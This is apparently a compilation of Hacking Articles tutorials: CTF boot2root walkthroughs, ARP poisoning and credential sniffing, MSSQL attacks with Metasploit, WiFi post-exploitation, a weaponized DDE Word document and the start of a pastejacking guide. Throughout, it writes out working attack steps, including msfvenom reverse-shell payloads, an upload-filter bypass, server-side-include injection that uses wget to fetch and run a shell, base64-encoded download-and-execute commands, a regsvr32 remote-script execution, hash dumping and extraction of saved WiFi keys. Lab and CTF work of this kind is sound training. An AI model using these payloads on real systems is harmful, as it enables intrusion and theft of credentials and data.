As we are logged in, there is an option to upload a file. Here, we can upload our malicious php code. To generate the code go to the terminal of kali and type:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw

Copy the code from <?php to die(); and save it in .txt file. After saving change the extension from .txt to .php and then upload it.

When you try to upload your .php file it will show that only jpg and png files can be uploaded. Okay! So now change the extension from .php to .jpg and then upload it but when you upload it remember to capture the request in burpsuite.

Once the request is captured in BurpSuite, change the file extension from .jpg back to .php and forward the request. This way your malicious .php code will be uploaded on the web application.

Our malicious file I s uploaded but we yet have to find the directory where it was uploaded so we can execute it and have our session. Therefore, next we will use DIRB. And for that type:

dirb http://192.168.0.105

Dirb has shown us that there is a directory named uploads so obviously there our file has been uploaded. To execute the file type the following in the URL:

192.168.0.105/uploadsd/shell.php

Like always before executing the file remember to activate your handler on Metasploit so that you can have your session. And for this open Metasploit and type:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.162.0.107

set lport 4444

exploit

After the handler is activated and your file is executed; you will have your meterpreter session. Let’s then further check system information and for that type:

sysinfo

Now that we have meterpreter session let’s explore a bit and look into html files:

cd /var/www/html

ls

There is a config.php file in var/www/html. This file has often proven to be important so let’s check it out.

cat config.php

Through config.php we know that one of the following words is a username and password :

root

toor

deneme

Let’s now go to shell and try to log in through these three keywords :

shell

mysql -uroot -p -Ddeneme

And then enter password toor

Once logged in let’s look for tables by using following command :

show tables;

As shown in above image there is table named user. Let’s see what this table has :

select * from user;

From the table we now know that password for root is asd123***. Let’s log in from it :

su root

asd123***

Let’s confirm our root access :

whoami

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hack the BTRSys1 VM (Boot2Root Challenge) appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as RickdiculouslyEasy. The credit for making this vm machine goes to “Luke” and it is another capture the flag challenge. Our goal is to capture flags and get 130 points in total to complete the challenge. You can download this VM here.

Let’s Breach!!!

The target holds 192.168.1.107 as network IP; now using nmap lets find out open ports.

nmap -p- -A 192.168.1.107

By doing the nmap scan, we find that port 21, 80, 9090, 13337, 22222, 60000 is open. Our nmap scan also shows us anonymous login is available on ftp.

We enumerate the open ports further using netcat and found 2 flags.

nc 192.168.1.107 13337

nc 192.168.1.107 60000

We opened port 9090 in web browser and find third flag.

Now we use dirb to list the directories, as port 80 is open.

dirb http://192.168.1.107/

Using dirb we found a page http://192.168.1.107/passwords/. When we open it we find two files ‘flag.txt’ and ‘passwords.html’.

When we open ‘FLAG.txt’ file and we our 4th flag.

Now we open the passwords.html file. We can’t find anything on the page so we take a look at the source code of  the file, inside we find a password for some user.

Nmap  scan showed that ftp is vulnerable to anonymous login. So we login ftp using username and password as anonymous.

When we access ftp we get a file called FLAG.txt, we open it and find our 5th flag.

We open robots.txt and find link to two files root_shell.cgi and tracertool.cgi

http://192.168.1.107/cgi-bin/tracertoll.cgi is vulnerable to command injection.

We find that few commands have been filtered we use ‘more‘ command to get the name of the users in /etc/passwd file.

more /etc/passwd

Now we login using ssh using username Summer and password winter that we found earlier.

ssh -p 22222 Summer@192.168.1.107

After connecting to ssh we find a file called FLAG.txt and inside the file we find our 6th flag.

Now searching through the files we came across an image and zip file inside Morty/ directory. We download the files into our system through ssh.

scp Safe_Password.jpg root@192.168.1.111:/root/Desktop

scp journal.txt.zip root@192.168.1.111:/root/Desktop

After download the files we use strings command to find if something is hidden inside the image file, and we find the password for unzipping journal.txt.zip file

strings Safe_Passwords.jpg

After unzipping the zip file, we open the file and find our 7th flag.

Back at the target VM we find an executable file called ‘safe’ we try to run it but we don’t have permissions to run it. So we download the file to our system.

scp safe root@192.168.1.111:/root/Desktop

Now when we run the file it asks for argument. We use the string found inside the last flag(131333)and we get a hint for a password for user RickSanchez.

As the password contains 1 uppercase character, 1 digit followed by one of the word in the name of the band of Rick Sanchez. We use crunch to create a dictionary. We find that the name of the band in which rick played was called ‘the flesh curtains’.

crunch 10 10 -t ,%Curtains -o /root/Desktop/pass.txt

crunch 7 7 -t ,%Flesh –o /root/Desktop/pass1.txt

After creating the dictionary, we use dymerge tool to combine the both dictionary to form a single dictionary.

python dymerge.py /root/Desktop/pass.txt /root/Desktop/pass1.txt -s -o /root/Desktop/password.txt

Now that our dictionary is ready we bruteforce ssh using metasploit.

msf > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > set rhosts 192.168.1.107

msf auxiliary(ssh_login) > set rport 22222

msf auxiliary(ssh_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(ssh_login) > set username RickSanchez

msf auxiliary(ssh_login) > run

After successfully brute-forcing ssh, we spawn terminal using python.

echo "import pty; pty.spawn("/bin/bash")'

After spawning the terminal, we take a look at the sudoers list. We find that we have all the privileges of root.

We switch to root user then move to root folder. Inside the root folder we find a file called FLAG.txt, when we open the file we find our final flag.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the RickdiculouslyEasy VM (CTF Challenge) appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as ‘H.A.S.T.E.’. The credit for making this vm machine goes to “f1re_w1re” and it is a unique challenge as we just have to get a reverse shell just to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.102 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV 192.168.0.102

We find port 80 is open, so we open the ip address in our browser.

We don’t find anything on the page so we use dirb for listing directories on the web server.

dirb http://192.168.1.102

Now when we open http://192.168.0.102/ssi we get a hint that the website maybe vulnerable to server side injection.

Now when we open http://192.168.0.102/index we find the code executed by the server.

Now we go back to http://192.168.0.102/ and use server side injection to execute our commands.

We executed ‘ls -al’ command to check if it is working, as u can see in the image below we successfully ran our command.

<!–##EXEC cmd=”ls -la” –>

Now we create a python payload using msfvenom.

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 > /root/Desktp/shell.py

Now we upload our shell to the server using server side injection.

<!–##EXEC cmd=”wget http://192.168.0.107/shell.py” –>

After successfully uploading the shell we use server side injection to execute our payload.

<!–##EXEC cmd=”python shell.py” –>

We setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.0.107

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

As soon as we execute our payload we get reverse shell. The main objective of the challenge was to get a reverse shell.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the H.A.S.T.E. VM Challenge appeared first on Hacking Articles.

ARP Protocol

The Address Resolution Protocol (ARP) is a communications protocol used for discovering the link layer address associated with a given Internet layer address, a critical function in the Internet protocol suite. ARP was defined by RFC 826 in 1982, and is Internet Standard STD 37. ARP is also the name of the program for manipulating these addresses in most operating systems.

ARP is used for mapping a network address (e.g. an IPv4 address) to a physical address like an MAC address. For more detail visit Wikipedia.org.

Requirement:

1. Kali Linux Machine
2. Windows Machine
3. Local Area Network
4. EtterCap tool
5. VM running Metasploitable
6. Wireshark (Protocol Analyzer)
7. XArp tool
8. FTP Client
9. Putty Client

ARP Protocol Process

Address Resolution Protocol is in many ways similar to a domain name service (DNS). As DNS resolves known domain names to an unknown IP address, similarly an ARP resolves known IP addresses to unknown MAC addresses, as shown below in given image

If we observe by the above image; IP address 192.168.1.102, wants to communicate to IP address 192.168.101, but does not know its physical (MAC) address. An ARP request is broadcasted to all systems within that network, including IP X.X.X.100, X.X.X.101, and X.X.X.103. When IP address X.X.X.101 receives the message, it replies back via unicast with an ARP reply. This response contains the physical (MAC) address of BB-BB-BB-BB-BB-BB as shown above, this ARP reply information is then placed in the ARP cache and held there for a short duration, to reduce the amount of ARP traffic on the network, The ARP cache stores the IP, MAC, and a timer for each entry. The timer’s duration many vary depending upon the Operating system in use, i.e., Windows operating system may store the ARP cache information for 2 minutes compare to a Linux machine which may retain it for 15 minutes or so.

Let us now begin with exploiting the ARP protocol to our advantage!!!

Scenario: Let us take the below scenario, where we will use 2 windows host machines Representing Host A and Host B as Victim and Kali Linux Host C used to target the victim’s. In following image you can see attacker has lunch arp poisoning attack which has poisoned the arp table by adding attacker Mac address with both HOST’s IP A & B.

Let’s Begin the ARP Poisoning Attack

The First step is to clear the ARP Cache of both the host by typing following command in command prompt arp -d for Host A, then Ping the Host A for reply, now type command arp -a, this will show you the physical (MAC) address of the Host A Machine .

Similarly let us do the same activity on the other systems which is Host B

Start Sniffing with Ettercap

Let us now start to exploit both Host A and Host B, from Host C machine, which is our Kali Linux, start sniffing with Ettercap tool as shown in the below image on Kali.

Go to Sniff and select Unified sniffing

Select the Network interface as appropriate, in this case it is eth0, click on OK

Now go to the Hosts Tab and Select Scan for Hosts as shown below to scan the connected system in a local network.

You will get the host list of all the scan hosts as shown below, let us now select our Targets from the host list X.X.X.101 and X.X.X.102, now add both the targets one by one by clicking on the tab Add to Target 1 and 2 respectively, from the given image we can see that both the targets are now added to our list.

Now go to Mitm (Man in the middle) and select ARP Poisoning. A Dialog box will appear for optional parameters.

Check the box “Sniff remote connection” and click OK

Go to start tab and click on start sniffing to target the Host A and B added.

Now let us go to our Kali machine and open the terminal, let us now type command ifconfig to determine our IP address and physical (MAC) address, in our case it is 00:0c:29:5b:8e:18 as highlighted in given image

Since we have started the arp poisoning attack on both the victim machine X.X.X.101 and 102 from our kali machine, if we go to any host and type arp -a on the command prompt, you will clearly see that the physical (MAC) address of the victim machine has changed to the physical (MAC) address of the kali machine, as shown above, Physical (MAC) address of both the IP X.X.X.102 and X.X.X.107 are same, which means that all the traffic from host X.X.X.102 is passing through Kali machine X.X.X.107

Demonstrate MITM with Wireshark

Let us now Open Wireshark on our kail machine and analyze the packets, let us filter the packets by typing the following command  icmp && (eth.sec = = 00:0c:29:5b:8e:18 || eth.dst == 00:0c:29:5b:8e:18), here in the command eth.sec means (Ethernet source) and eth.dst means (Ethernet destination), the MAC address are common in both source and destination which is the physical MAC address of our Kali machine, what we see is the source IP X.X.X.102 and destination X.X.X.101 are getting captured by the Kali machine which has a Physical (MAC) address 00:0c:29:5b:8e:18, hence proving  successful sniffing of the victim machine.

Combining DNS Spoofing with sniffing

Let us now exploit both of our victim machines with DNS Spoofing attack

From your Kali machine go to the path: /root/etc/ettercap/etter.dns, open the file and remove any content if available, after then type the value * A (your Kali Linux IP address) as shown below and save the file.

Next step is to go to the ettercap tool and select plugins and click on manage the plugins as shown below:

Now select dns_spoof plug-in, once selected you will see (*) sign on the said plug-in.

Now if from the victim machine we type the command ping www.google.com, you will observe that the reply is getting received from IP X.X.X.107 which is the IP for our Kali machine, which means that the kali machine has become the DNS server for the victim machine.

Let us now add one more plug-in the same way we added dns_spoofing plug-in, this time we will use remote browser plug-in as shown in the image below. Once this plug-in get added, you can capture all the browser activity performed by the victim on his browser including user name and passwords.

Capturing NTLM passwords

Open kali terminal and type msfconsole, once the console starts type: search http_ntlm, now type: use auxiliary/server/capture/http_ntlm as shown in the below image:

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.0.107

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

Now according to above trap set for victim this module will capture NTLM password of victim’s system when he will open any http web site on his browser which will redirect that web site on attacker’s IP.

From given below image you can notice victim is trying to browse “imdb.com” on his web browser but it requires authentication which is requesting for his username and password. Now if he try to open something else let says google.com there also it will ask username and password for authentication, until the victim will not submit his username and password he cannot browse anything on his web browser.

As the victim enter username and password, attacker at background will capture NTLM hash on his system.

Great!! The attacker had captured NTMLv2 hash; now let count detail apart from hash value that the attacker has captured.

From given image you can see that attacker has captured two things more:

Username: raj

Machine name: WIN-1GKSSJ7D2AE

Now use john the ripper to crack the ntlmv2 hash by executing given below command

john _netntlmv2

From given below image you can confirm, we have successfully decoded the captured hashes with user name as raj and password as 123.

Combining DHCP Spoofing with sniffing

DHCP spoofing: A fake DHCP server is setup by attacker in a local network, which broadcast a large number Request message of false IP configuration to genuine Client.

Go to ettercap and click on Mitm, select DHCP spoofing

Form the below image, provide the necessary information

• IP Pool – 168.0.200-210 (put and IP range to issue IP to the system connected to the network, this will work as DHCP server)
• Netmask 255.255.0 (as per the IP Class)
• DNS Server IP 168.0.1 (as per the IP Class)

Click OK and Start sniffing

Here I have turn on the “metasploitable server” given below image shows the IP 192.168.0.202 which is from the pool of IP range we provided on ettercap DHCP.

Let us now go to the client machine and try to connect the metasploitable server with FTP (File Transfer Protocol) client as shown in the below image

Provide the host name (IP), user name and password to connect to the FTP server.

From the given below image we can see that, the information such as username and password for FTP is getting captured by ettercap provided by the host machine, in our case it is User:msfadmin, PASS:msfadmin

From given below image you can perceive that now we are trying to connect with metasploitable server (192.168.0.202) through telnet via port23 using putty. it will prompt you for the user name and password, provide the necessary information .

From the above image we can clearly see that ettercap has captured the credential information been provide by the user in our case it is User:msfadmin Pass: msfadmin for telnet service.

HTTP Password Sniffing

Let us now do the same through HTTP (Hypertext Transfer Protocol)

From the below image, we can see dvwa service is running in our metasploitable server, through the client browser let us type 192.168.0.202/dvwa/login.php, it will prompt for username and password, lets provide the credentials.

We could see from the below image, ettercap has once again captured the username and password been provide by the user from browser, in our case it is username: admin and PASS: password for HTTP service.

SMTP Password Sniffing

Lastly let us now try this with SMTP (Simple Mail Transport Protocol) Sniffing.

First step is to configure SMTP Server in your environment please click Here as to how we can configure SMTP server in windows machine.

Once the Server is configured, and we have setup email clients on the target machines,

Let us open Ettercap and add both our Targets X.X.X.102 and X.X.X.104 and select ARP poisoning

Now let us send an email from Target A to Target B as shown below

Here target A: raj@pentestlab.local is sender who is sending message to target B: aarti@pentestlab.local  and hence port 25 for SMTP service will get in action.

Given below image has confirm that Aarti has received raj’s mail successfully, while at background attacker is sniffing all the traffic passes through router.

If we now go to Ettercap console, we can clearly see that it has successfully sniffed the traffic between Target A and Target B and captured the credential of Target A (Raj) as shown in above image.

Capture Email of SMTP server with Wireshark

Go to wire shark are put the filter smtp && (eth.src == 00:0c:29:4a:47:75 || eth.dst == 00:0c:29:4a:47:75) the MAC address filter is for our kali machine, you will observe it has captured packets from both our target Machines.

It has sniff every all SMTP packets , captured the both email IDs i.e. sender and receiver  with message been sent to Target B which is Hello Friends today we are performing smtp sniffing , which shows that we have been successful on our attack on the selected targets, as shown in image below.

Throughout this article, we discussed around ways and techniques that can be used to exploit the Arp protocol successfully, let us now discuss briefly around the technique to be used to detect the arp attack.  

ARP Attack Detection                

There are various tools available to detect the arp attack, one of the most common tools is XArp tool, which we will be using for this article.

We can run this tool in any host machine in the network to detect the arp attack, above image shows the affected systems on the network highlighted in red (X), we can disconnect these host from the network and decide upon next course of action to mitigate these risk by implementing the following controls:

1. Dynamic address inspection
2. DHCP snooping
3. VLAN hopping prevention

Author: Krishnan Sharma is a technology professional having passion for information security and related fields, he loves technical writing and is part of our hacking article team, he may be contacted Here

The post Comprehensive Guide to Sniffing appeared first on Hacking Articles.

Hello friends today we are performing MSSQL penetration testing using metasploit framework in order to retrieve basic information such as database name, usernames, tables name and etc from inside SQL server running on Windows operating system. In our previous article we had setup Microsoft SQL server in Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.1.104

msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(mssql_login) > run

This will perform brute force attack matching valid combination for username and password from given dictionary.

In specified image you can observe that we had successfully retrieve credential for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration setting

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum) >set password admin123

msf auxiliary(mssql_enum) >run

Above module had dumped the MSSQL configuration setting where you can observe enabled and disable functions. For example:

Xp-cmdshell is enabled which is a function of Microsoft SQL Server that allows system administrators to execute operating system command. Attacker can inject malicious command of file for making unauthorized access into server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

use auxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins) >set rhosts 192.168.1.104

msf auxiliary(mssql_enum_sql_logins) > set password admin123

msf auxiliary(mssql_enum_sql_logins) > run

From given below image you can confirm the MSSQL Server login such as “sa” which is also sysadmin and another user “ignite”. Once you have enumerated all logins after that you can make dictionary attack for their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the msssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_dbowner) > set password admin123

msf auxiliary(mssql_escalate_dbowner) >run

Above module will identify whether specified user do have system administrator role or not. From given below image you can perceive that “sa” is sysadmin user.

Identify a User With masquerade privilege

This module can be used escalate privileges if the IMPERSONATION privilege has been assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

use auxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_execute_as) > set password admin123

msf auxiliary(mssql_escalate_execute_as) > run

From given below image you can perceive that “sa” is sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.

use auxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql) > set rhosts 192.168.1.104

msf auxiliary(mssql_sql) > set password admin123

msf auxiliary(mssql_sql) > run

From given below image you can observe that by default it has run SQL statement to Select version as result it has dumped the complete detail version of SQL server. Here you can execute your own sql statement. 

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump

msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104

msf auxiliary(mssql_hashdump) > set password admin123

msf auxiliary(mssql_hashdump) > run

From given below image you can read the hash value of password set for every database user in MMSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast) > run

Great!!  The tool John the ripper has successfully decoded the hash value set for passwords.

Extracting MYSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104

msf auxiliary(mssql_schemadump) > set password admin123

msf auxiliary(mssql_schemadump) > run

Here it has dump the information schema for database “ignite” with table name “student” , 4 columns name with column types:

DB: ignite

Table name: student_details

Execute malicious .dll code through xp-cmdshell as CMD statement

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115

msf exploit(regsvr32_applocker_bypass_server) > set lport 4455

msf exploit(regsvr32_applocker_bypass_server) > run

Since we known xp_cmdshell function is enabled in SQL server therefore we can easy shoot the target machine by injecting a malicious .dll file through xp_cmdshell function.

After executing above module we will get malicious .dll code as highlighted in the below image, copy this code for injecting into xp_cmdshell as statement.

This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module

use auxiliary/admin/mssql/mssql_exec

msf auxiliary(mssql_exec) > set rhosts 192.168.1.104

msf auxiliary(mssql_exec) > set password admin123

msf auxiliary(mssql_exec) >set CMD “regsvr32 /s /n /u /i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll”

msf auxiliary(mssql_exec) >run

If you will observe above command sets in specified module, you will notice that here we have set above copied malicious .dll code as CMD statement. Hence as soon as we will run this exploit it creates a backdoor in victim’s machine for unauthorized access.

Wonderful!! We have got reverse connection of target machine through meterpreter session.

Exploit xp_cmdshell vulnerability

This module executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows ‘debug.com’. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wcsript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.

use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) >set rhost 192.168.1.104

msf exploit(mssql_payload) >set password admin123

msf exploit(mssql_payload) >set srvhost 192.168.1.115

msf exploit(mssql_payload) >run

Awesome!!  Once again we have got reverse connection of target machine through meterpreter session.

Author: Sanjeet Kumar is a Information Security Analyst | Pentester | Researcher  Contact Here

The post MSSQL Penetration Testing with Metasploit appeared first on Hacking Articles.

Hello friends! Today we are going to take another CTF challenge known as dina. The credit for making this vm machine goes to “Touhid Shaikh” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.104

Nmap scan shows us port 80 is open, so we open the ip address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.104/

We find robots.txt, we open robots.txt in our browser and name of the directories of the server.

We open nothing/ directory and find a 404 page. We take a look at the source code of the webpage and find a few passwords.

Now we open secure/ directory that we found using dirb. Inside the directory we find a zip file we download it in our system.

After download it in our system we try to unzip it but it prompts for password. So we try one of the passwords that we found earlier inside the web-page. The password turns out to be ‘freedom’

Now after we extract the file we find a mp3 file. We check the file type and find out it is actually a ascii file. We open it and find a username and a name of directory.

Now we open the directory and find a login page. We use one of the passwords from the web-page.

We use username touhid and find password to be diana.

After logging in we find that the author has created a vulnerable application. The details of how to exploit this vulnerability are given by the author here.

First we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.124

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now we create our payload using msfvenom

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.124 lport=4444 -f elf > /var/www/html/shell

Now we convert our commands to upload the shell to base64 to bypass the firewall.

echo ‘wget http://192.168.1.124/shell  -O /tmp/shell’ |base64

echo ‘chmod 777 /tmp/shell’ |base64

echo ‘/tmp/shell’ |base64

Now to execute the upload our shell we change the name of the file with our php code to execute our shell commands. We use the the following code to replace the name of the file we upload.

<?php shell_exec(base64_decode(‘base64encodestring’)); die();?>\”.php

Now as soon as we execute our shell we get reverse connection. Now we take a look at the sudoers list and we find that we have access to perl. So we spawn our shell using perl.

sudo -l

sudo perl -e “exec ‘/bin/sh’”

Now we go to root folder and we find the final flag. When we open the flag we find a message congratulating us on the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the dina VM (CTF Challenge) appeared first on Hacking Articles.

Hello readers! Today you will be learning about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too.

First Hack the Victim PC Using Metasploit (tutorial how to hack remote pc) after that get admin access through Bypassuac (click here)

After getting the meterpreter of victim pc background the current session and type in below given command. This will provide you list of different exploits that you can use for desired purpose. Here we will be using last four in the list. Here you go….. 

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important  information regarding wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf post> use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

this will give you entire wireless connection list with passwords as well.  VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared

About Author

Nisha Yadav is trained in Certified Ethical hacking and Bug Bounty Hunter. She is currently working at Hiddenramp as a Security Analyst. Connect with her here

The post Wifi Post Exploitation on Remote PC appeared first on Hacking Articles.

DDE stands for “dynamic Data Exchange”, this is a method used by windows to facilitate one program being able to subscribe to an item made using another program. This exploit uses that functionality to exploit the victim endpoint. Once the victim clicks on the word file, a HTA payload is retrieved via HTTP and session is achieved.

Here is a step-by-step depiction of how it happens:

The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension, you can name it anything you like, to avoid any confusion, ours is names “dde_delivery.rb”. This file has to now be moved into the windows section of the exploit folder in Metasploit, you can find the path and exploit URL below.

Exploit URL – https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Path of windows folder in Kali – usr > share > metasploit-framework > modules > exploits > windows

Here is what the exploit being pasted into the “windows” folder will look like.

Now open terminal and start Metasploit, once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, this is the host IP. Once the exploit loads, type “set srvhost” followed by your IP, you can see what that would look like in the screenshot given below.

Press enter and you’re all set.

Type “exploit” and press Enter.

You will see a code generated, it has been highlighted in the screenshot given below. Copy this code.

NOTE: Do not close the terminal, it must remain active throughout.

Open Microsoft Word, navigate to the “Insert” tab, under the “Text” section you will find “Quick Parts”, click on it and in the drop menu you will see “Field…”

Click on “Field…”, another windows will appear, by default it will look like the screenshot pasted below, click OK

Once you click on OK, a text will appear “! Unexpected End of Formula”, select this text and right click on it, in the menu choose option “Toggle Field Codes”.

Once this is done, the text will change to “{  =\* MERGEFORMAT } “

Paste the code you copied from Metasploit within the “{ }”, as seen below.

Save the file in a “.docx” format, you can name it anything you like and close Microsoft Word.

You now have a handy word file that can be opened on a Windows 10 machine to achieve session.

Here is what it looks like when the word file is opened:

Once the word file is opened, you will see the following message, click “Yes”.

Next this message will appear. Again, click “Yes”

Finally this message will appear, click “OK”

Now go back to the terminal in kali for the good part.

You will see that the moment OK is clicked in the image above, Meterpreter will come online and you will have achieved session just like that!!

If in case you were wondering why at the beginning we made you manually copy the code into Leafpad and save it into Metasploit, it’s because this is a new exploit and has not been updated into the Metasploit database.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

The post Exploiting Windows Machine with DDE Exploit appeared first on Hacking Articles.

Pastejacking is a technique that takes over the clipboard of a machine, for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when you paste that text. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is; copy some harmless words from the browser and paste them on the command prompt and that’s it, session!!

We are going to walk you through the process, using a tool called PasteZort

Here’s how it happens:

The first thing you’ll need to do is get the tool from Github.

To keep it simple, from you Kali terminal, navigate to the desktop using “cd Desktop”. Once you’re at “root@kali:~/Desktop#”, type “git clone https://github.com/Zetahack/PasteZort.git”. This will make a PasteZort folder on your desktop with the tool in it

Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.

In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing file as program”.

Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.

Now we can get started making our pastejacking payload using the tools interphase. We will be making a windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.

